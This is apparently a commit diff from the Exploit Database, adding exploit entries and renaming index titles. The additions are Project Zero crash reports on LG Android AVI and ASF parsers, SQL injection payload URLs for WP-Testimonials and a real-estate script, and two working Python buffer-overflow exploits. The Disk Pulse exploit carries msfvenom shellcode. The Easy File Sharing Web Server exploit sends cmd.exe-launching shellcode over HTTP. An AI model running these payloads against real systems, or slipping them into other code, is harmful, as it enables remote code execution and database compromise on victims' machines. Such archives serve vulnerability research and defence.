TFTP Server 1.4 - WRQ Buffer Overflow (Egghunter)
TFTP Server 1.4 - 'WRQ' Buffer Overflow (Egghunter)

Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)
Easy File Sharing Web Server 7.2 - (SEH) Overflow (Egghunter)

Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow

Win32 - SEH omelet Shellcode
Win32 - SEH Omelet Shellcode
dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion
DreamAccount 3.1 - (da_path) Remote File Inclusion
dotWidget CMS 1.0.6 - 'file_path' Remote File Inclusion
DreamAccount 3.1 - 'da_path' Remote File Inclusion

AWF CMS 1.11 - (spaw_root) Remote File Inclusion
AWF CMS 1.11 - 'spaw_root' Remote File Inclusion

Download-Engine 1.4.2 - (spaw) Remote File Inclusion
Download-Engine 1.4.2 - 'spaw' Remote File Inclusion

Newsscript 1.0 - Administrative Privilege Elevation
Newsscript 1.0 - Administrative Privilege Escalation

UBBCentral UBB.Threads 3.4/3.5 - Denial of Serviceearch.php SQL Injection
UBBCentral UBB.Threads 3.4/3.5 - 'Dosearch.php' SQL Injection

Cerberus Helpdesk 2.649 - cer_KnowledgebaseHandler.class.php _load_article_details Function SQL Injection
Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php' '_load_article_details' Function SQL Injection

cPanel 10.9 - Denial of Serviceetmytheme theme Parameter Cross-Site Scripting
cPanel 10.9 - dosetmytheme 'theme' Parameter Cross-Site Scripting

WordPress < 2.1.2  - PHP_Self Cross-Site Scripting
WordPress < 2.1.2 - PHP_Self Cross-Site Scripting
WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection
Real Estate Classifieds Script - SQL Injection

platforms/android/dos/42169.txt

@@ -0,0 +1,64 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1221
+
+Similar to the previously reported  issue 1206 , when parsing AVI files the 
+CAVIFileParser object contains a fixed-size array of (what appears to be)
+pointer/length pairs, used (I suppose) to store the data for each stream.
+
+This is a fixed size, with 40 entries. However, it is never verified that the
+number of streams in the file is less than this number; and when freeing the 
+CAVIFileParser object, we will iterate through this array past the end of the
+object, freeing each non-NULL pointer entry.
+
+This presents initially as a free of an uninitialised pointer, since there is
+a correctly aligned field inside the CAVIFileParser object that does not appear
+to be used at all; careful heap grooming can turn this into a free of an 
+attacker controlled value. It can also however be used to traverse outside the
+object by ensuring that this uninitialised value is a NULL pointer, and instead 
+free pointers from the object following the CAVIFileParser object, resulting in
+a use-after-free.
+
+The attached sample file (and generation script) triggers the latter case, and 
+will usually crash attempting to free an invalid pointer from outside the bounds
+of the CAVIFileParser object.
+
+The two quirks of the attached sample file necessary to reach this vulnerability
+are that the number of streams in the avi are larger than 40 and that the file
+is truncated before the strl LIST objects are completed, to avoid triggering a 
+NULL-pointer dereference attempting to retrieve the movi information for the 
+file.
+
+Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
+Revision: '11'
+ABI: 'arm'
+pid: 9473, tid: 9473, name: mediaserver  >>> /system/bin/mediaserver <<<
+signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xf0040070
+AM write failed: Broken pipe
+    r0 00000002  r1 0000000f  r2 ffffffd0  r3 f6dd12f0
+    r4 f6dd12e8  r5 f0051c88  r6 f6202000  r7 f0040000
+    r8 f6209008  r9 f6dc4594  sl 00000001  fp ffc82f9c
+    ip f004003c  sp ffc82d38  lr f6da67a7  pc f6da3826  cpsr 200f0030
+
+backtrace:
+    #00 pc 00055826  /system/lib/libc.so (ifree+49)
+    #01 pc 000587a3  /system/lib/libc.so (je_free+374)
+    #02 pc 000059ad  /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser7DestroyEv+164)
+    #03 pc 00005a33  /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD1Ev+14)
+    #04 pc 00005a45  /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD0Ev+4)
+    #05 pc 0000442f  /system/lib/liblg_parser_avi.so (_ZN9AVIParser5CloseEv+12)
+    #06 pc 00025a49  /system/lib/libLGParserOSAL.so (_ZN7android14LGAVIExtractorC2ERKNS_2spINS_10DataSourceEEE+308)
+    #07 pc 00022a67  /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+38)
+    #08 pc 000c033b  /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
+    #09 pc 000d66db  /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34)
+    #10 pc 000591e3  /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82)
+    #11 pc 0008e329  /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468)
+    #12 pc 00019931  /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
+    #13 pc 0001eccb  /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
+    #14 pc 0001ee35  /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
+    #15 pc 0001ee99  /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
+    #16 pc 00001c15  /system/bin/mediaserver
+    #17 pc 000174a9  /system/lib/libc.so (__libc_init+44)
+    #18 pc 00001e68  /system/bin/mediaserver
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42169.zip

platforms/android/dos/42170.txt

@@ -0,0 +1,80 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1206
+
+Missing bounds-checking in AVI stream parsing
+
+When parsing AVI files, CAVIFileParser uses the stream count from the AVI header 
+to allocate backing storage for storing metadata about the streams (member 
+variable m_aStream). However, the number of stream headers we parse is never 
+validated against this allocation size during parsing, so we can write further 
+metadata past the end of this buffer by constructing a file which contains more
+stream headers than expected.
+
+The allocation happens here:
+
+int CAVIFileParser::ParseChunkAviHdr(int a2, unsigned int chunk_size)
+{
+  struct AviHeader *avih;
+  int result;
+
+  // snip some sanity checking (have we already found an 'avih' chunk, is this
+  // chunk large enough to contain an avi header.)
+
+  result = AVISourceReader::AVI_fread(this->source, avih, sizeof(struct AviHeader), 1);
+  if ( result <= 0 )
+  {
+    // snip...
+  }
+  else
+  {
+    stream_count = avih->dwStreams; // <-- this is an attacker-controlled count
+    this->m_aStreamCount = stream_count;
+    this->m_aStream = malloc(stream_count * sizeof(struct AviStream));
+    this->m_aStreamIndex = -1;
+
+    // snip...
+  }
+
+  return 1;
+}
+
+There doesn't appear to be any integer overflow checking in the multiplication
+either; so if the current issue is directly fixed there could still be a 
+vulnerability if stream_count * sizeof(struct AviStream) overflows.
+
+this->m_aStreamIndex is incremented without checking in 
+CAVIFileParser::ParseChild and used as an index into m_aStream in several places
+without checking, including in CAVIFileParser::ParseChunkStrHdr and
+CAVIFileParser::ParseChunkStrFmt.
+
+Several of the values that we can get written out of bounds are pointers to 
+controlled data, which is an interesting exploitation primitive. I've attached
+a PoC file and script to generate it which results in overlapping a SRIFFNode* 
+with the contents of a 'strf' chunk, resulting in a free of an attacker 
+controlled pointer - in this case, 0x41414141. Since the structure sizes are 
+dependent on the version of the library, this may not work on different builds, 
+but it will hopefully cause a crash regardless.
+
+Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
+Revision: '11'
+ABI: 'arm'
+pid: 19481, tid: 19585, name: Binder_2  >>> /system/bin/mediaserver <<<
+signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x4140007c
+    r0 00000002  r1 00000012  r2 ffffffd0  r3 f6b572f0
+AM write failed: Broken pipe
+    r4 f6b572e8  r5 41414141  r6 f5fb6000  r7 41400000
+    r8 f155c748  r9 f6b4a594  sl 00000001  fp f000081c
+    ip 41400048  sp f00005f8  lr f6b2c7a7  pc f6b29826  cpsr 200f0030
+
+backtrace:
+    #00 pc 00055826  /system/lib/libc.so (ifree+49)
+    #01 pc 000587a3  /system/lib/libc.so (je_free+374)
+    #02 pc 000058f3  /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser15DeleteSRIFFNodeEP9SRIFFNode+54)
+    #03 pc 00005915  /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser7DestroyEv+12)
+    #04 pc 00005a33  /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD1Ev+14)
+    #05 pc 00005a45  /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD0Ev+4)
+    #06 pc 0000442f  /system/lib/liblg_parser_avi.so (_ZN9AVIParser5CloseEv+12)
+    #07 pc 00025baf  /system/lib/libLGParserOSAL.so (_ZN7android14LGAVIExtractorD1Ev+26)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42170.zip

platforms/android/dos/42171.txt

@@ -0,0 +1,44 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1222
+
+There is a memcpy in ASFParser::ParseHeaderExtensionObjects which doesn't check
+that the size of the copy is smaller than the size of the source buffer, 
+resulting in an out-of-bounds heap read.
+
+The vulnerable code appears to be in handling the parsing of an extension object of
+type ASF_Metadata_Object with a Description Record with an overly large length.
+
+See attached for a crash poc. This issue probably allows leaking mediaserver 
+memory from an app process on the device via the retrieved metadata.
+
+Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
+Revision: '11'
+ABI: 'arm'
+pid: 10423, tid: 10533, name: Binder_2  >>> /system/bin/mediaserver <<<
+signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xf05c0000
+    r0 ef5aff40  r1 f05bfff5  r2 00f5007f  r3 00000000
+    r4 f050b280  r5 f0510000  r6 00ffffff  r7 00000000
+    r8 000000b5  r9 00000034  sl 00000000  fp f05455a0
+    ip f05e2e1c  sp f06f35c8  lr f05d8c9d  pc f71d77b4  cpsr 200b0010
+
+backtrace:
+    #00 pc 000177b4  /system/lib/libc.so (__memcpy_base+88)
+    #01 pc 00003c99  /system/lib/liblg_parser_asf.so (_ZN9ASFParser27ParseHeaderExtensionObjectsEv+436)
+    #02 pc 00006a87  /system/lib/liblg_parser_asf.so (_ZN9ASFParser6OpenExEP11IDataSourcei+50)
+    #03 pc 00024a93  /system/lib/libLGParserOSAL.so (_ZN7android12ASFExtractorC1ERKNS_2spINS_10DataSourceEEERKNS1_INS_8AMessageEEE+270)
+    #04 pc 00022aa9  /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+104)
+    #05 pc 000c033b  /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
+    #06 pc 000d66db  /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34)
+    #07 pc 000591e3  /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82)
+    #08 pc 0008e329  /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468)
+    #09 pc 00019931  /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
+    #10 pc 0001eccb  /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
+    #11 pc 0001ee35  /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
+    #12 pc 0001ee99  /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
+    #13 pc 00023909  /system/lib/libbinder.so
+    #14 pc 000100d1  /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
+    #15 pc 0003f9ab  /system/lib/libc.so (_ZL15__pthread_startPv+30)
+    #16 pc 0001a0c5  /system/lib/libc.so (__start_thread+6)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42171.zip

platforms/php/webapps/42166.txt

@@ -0,0 +1,43 @@
+# Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection
+# Date: 03-06-2017
+# Exploit Author: Dimitrios Tsagkarakis
+# Website: dtsa.eu 
+# Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/
+# Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
+# Version: 3.4.1
+# CVE : CVE-2017-9418
+
+# Category: webapps
+
+ 
+
+1. Description:
+
+   
+
+SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for
+WordPress allows an authenticated user to execute arbitrary SQL commands via
+the testid parameter to wp-admin/admin.php.
+
+2. Proof of Concept:
+
+http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedi
+t&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL--
+comment
+
+3. Solution:
+
+   
+
+The plugin has been removed from WordPress. Deactivate the plug-in and wait
+for a hotfix.
+
+ 
+
+4. Reference:
+
+http://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-inje
+ction-sqli/
+
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418
+

platforms/php/webapps/42167.txt

@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Real Estate Classifieds Script - SQL Injection
+# Dork: N/A
+# Date: 12.06.2017
+# Vendor : http://www.easyrealestatescript.com/
+# Software: http://www.easyrealestatescript.com/demo.html
+# Demo: http://www.easyrealestatescript.com/demo.html
+# Version: N/A
+# # # # #
+# Author: EziBilisim
+# Author Web: https://ezibilisim.com/
+# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.
+# # # # #
+# SQL Injection :
+# http://localhost/[PATH]/site_search.php?s_purpose=[SQL]
+# http://localhost/[PATH]/seller_listing_info_calendar_title.php?listing=&xmonth=[SQL]&xyear=[SQL]
+# http://localhost/[PATH]/seller_listing_info_calendar_prev.php?listing=&xmonth=[SQL]&xyear=[SQL]
+# http://localhost/[PATH]/seller_listing_info_calendar_next.php?listing=&xmonth=[SQL]&xyear=[SQL]
+# http://localhost/[PATH]/seller_listing_info_calendar_big.php?listing=&xmonth=[SQL]&xyear=[SQL]
+# # # # #

platforms/windows/local/42163.py

@@ -0,0 +1,80 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title:        Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow
+# Date:                 12-06-2017
+# Exploit Author:       abatchy17 -- @abatchy17
+# Vulnerable Software:  Disk Pulse v9.7.26 (Freeware, Pro, Ultimate)
+# Vendor Homepage:      http://www.diskpulse.com/  
+# Version:              9.7.14
+# Software Link:        http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate)
+# Tested On:            Windows XP SP3 (x86), Win7 SP1 (x86)
+#
+# To trigger the exploit:
+#   1. Under Directories, click the plus sign
+#   2. Paste content of exploit.txt in Add Directory textbox.
+#
+#       <--- Marry and reproduce --->
+#
+##############################################################################
+
+a = open("exploit.txt", "w")
+
+badchars = "\x0a\x0d\x2f"
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
+buf =  ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
+buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
+buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
+buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
+buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
+buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
+buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
+buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
+buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
+buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
+buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
+buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
+buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
+buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
+buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
+buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
+buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
+buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
+buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
+buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
+buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
+buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
+buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
+buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
+buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
+buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
+buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
+buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
+buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
+buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
+
+# 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Disk Pulse\bin\QtGui4.dll)
+
+jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAA\BBB, ESP -> AAA (without the \BBB part)
+
+llamaleftovers = (
+    "\x55"  # push EBP
+    "\x58"  # pop EAX
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = EBP + 0x200
+    "\x40"  # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
+    )
+
+junk = "\x55" + "\x53\x5b" * 107
+
+data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf
+
+a.write(data)
+a.close()

platforms/windows/remote/42165.py

@@ -0,0 +1,84 @@
+#!/usr/bin/python
+
+# Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow
+# Author : Touhid M.Shaikh
+# Date : 12 June, 2017
+# Contact: touhidshaikh22@gmail.com
+# Version: 7.2
+# category: Remote Exploit
+# Tested on: Windows XP SP3 EN [Version 5.1.2600]
+
+
+"""
+######## Description ########
+
+    What is Easy File Sharing Web Server 7.2 ?
+    Easy File Sharing Web Server is a file sharing software that allows
+visitors to upload/download files easily through a Web Browser. It can help
+you share files with your friends and colleagues. They can download files
+from your computer or upload files from theirs.They will not be required to
+install this software or any other software because an internet browser is
+enough. Easy File Sharing Web Server also provides a Bulletin Board System
+(Forum). It allows remote users to post messages and files to the forum.
+The Secure Edition adds support for SSL encryption that helps protect
+businesses against site spoofing and data corruption.
+
+
+######## Video PoC and Article ########
+
+https://www.youtube.com/watch?v=Mdmd-7M8j-M
+http://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/
+
+ """
+
+import httplib
+
+
+total = 4096
+
+#Shellcode Open CMD.exe
+shellcode = (
+"\x8b\xec\x55\x8b\xec"
+"\x68\x65\x78\x65\x2F"
+"\x68\x63\x6d\x64\x2e"
+"\x8d\x45\xf8\x50\xb8"
+"\xc7\x93\xc2\x77"
+"\xff\xd0")
+
+
+our_code = "\x90"*100 #NOP Sled
+our_code += shellcode
+our_code += "\x90"*(4072-100-len(shellcode))
+
+# point Ret to Nop Sled
+our_code += "\x3c\x62\x83\x01" # Overwrite RET
+our_code += "\x90"*12 #Nop Sled
+our_code += "A"*(total-(4072+16)) # ESP pointing
+
+
+
+# Server address and POrt
+httpServ = httplib.HTTPConnection("192.168.1.6", 80)
+httpServ.connect()
+
+httpServ.request('POST', '/sendemail.ghp',
+'Email=%s&getPassword=Get+Password' % our_code)
+
+response = httpServ.getresponse()
+
+
+httpServ.close()
+
+"""
+NOTE : After Exiting to cmd.exe our server will be crash bcz of esp
+Adjust esp by yourself ... hehhehhe...
+"""
+
+"""
+__ __| _ \  |   | |   |_ _| __ \
+   |  |   | |   | |   |  |  |   |
+   |  |   | |   | ___ |  |  |   |
+  _| \___/ \___/ _|  _|___|____/
+
+Touhid M.Shaikh
+"""